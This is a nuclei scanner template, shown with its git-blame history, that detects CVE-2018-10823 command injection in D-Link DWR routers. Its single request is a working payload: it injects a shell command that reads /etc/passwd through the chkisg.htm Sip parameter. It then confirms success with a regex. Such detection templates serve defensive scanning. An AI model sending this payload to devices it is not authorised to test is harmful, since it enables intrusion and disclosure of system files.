nuclei-templates/http/cves/2018/CVE-2018-10823.yaml

id: CVE-2018-10823

info:
  name: D-Link Routers - Remote Command Injection
  author: wisnupramoedya
  severity: high
  description: |
    D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
  remediation: |
    Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45676
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10823
    - https://seclists.org/fulldisclosure/2018/Oct/36
    - http://sploit.tech/2018/10/12/D-Link.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-10823
    cwe-id: CWE-78
    epss-score: 0.96827
    epss-percentile: 0.99604
    cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dwr-116_firmware
  tags: cve2018,rce,iot,dlink,router,edb,seclists,cve

http:
  - method: GET
    path:
      - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100fde4dc11bd167a86bba29972db18f34dd7af0a25c4854e565ef869542cc1dd1a022100d450d2d695813c79ff488d87be2df97dafdc0f27735f0cb152f7e625462eb36a:922c64590222798bb761d5b6d8e72950
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`id: CVE-2018-10823`

			`info:`
Enhancement: cves/2018/CVE-2018-10823.yaml by mp 2022-06-19 15:45:43 +00:00			`name: D-Link Routers - Remote Command Injection`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`author: wisnupramoedya`
			`severity: high`
Update CVE-2018-10823.yaml 2022-06-20 15:50:55 +00:00			`description: \|`
Auto Generated CVE annotations [Mon Jun 20 17:58:28 UTC 2022] :robot: 2022-06-20 17:58:28 +00:00			`D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`remediation: \|`
			`Apply the latest firmware update provided by D-Link to mitigate this vulnerability.`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/45676`
			`- https://nvd.nist.gov/vuln/detail/CVE-2018-10823`
Auto Generated CVE annotations [Mon Jun 20 17:58:28 UTC 2022] :robot: 2022-06-20 17:58:28 +00:00			`- https://seclists.org/fulldisclosure/2018/Oct/36`
			`- http://sploit.tech/2018/10/12/D-Link.html`
Auto Generated CVE annotations [Mon Oct 18 15:19:41 UTC 2021] :robot: 2021-10-18 15:19:41 +00:00			`classification:`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.8`
Auto Generated CVE annotations [Mon Oct 18 15:19:41 UTC 2021] :robot: 2021-10-18 15:19:41 +00:00			`cve-id: CVE-2018-10823`
			`cwe-id: CWE-78`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.96827`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00			`epss-percentile: 0.99604`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`cpe: cpe:2.3:o:dlink:dwr-116_firmware::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: dlink`
			`product: dwr-116_firmware`
			`tags: cve2018,rce,iot,dlink,router,edb,seclists,cve`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00
			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Thu Nov 23 07:42:51 UTC 2023] :robot: 2023-11-23 07:42:52 +00:00
			`# digest: 4b0a00483046022100fde4dc11bd167a86bba29972db18f34dd7af0a25c4854e565ef869542cc1dd1a022100d450d2d695813c79ff488d87be2df97dafdc0f27735f0cb152f7e625462eb36a:922c64590222798bb761d5b6d8e72950`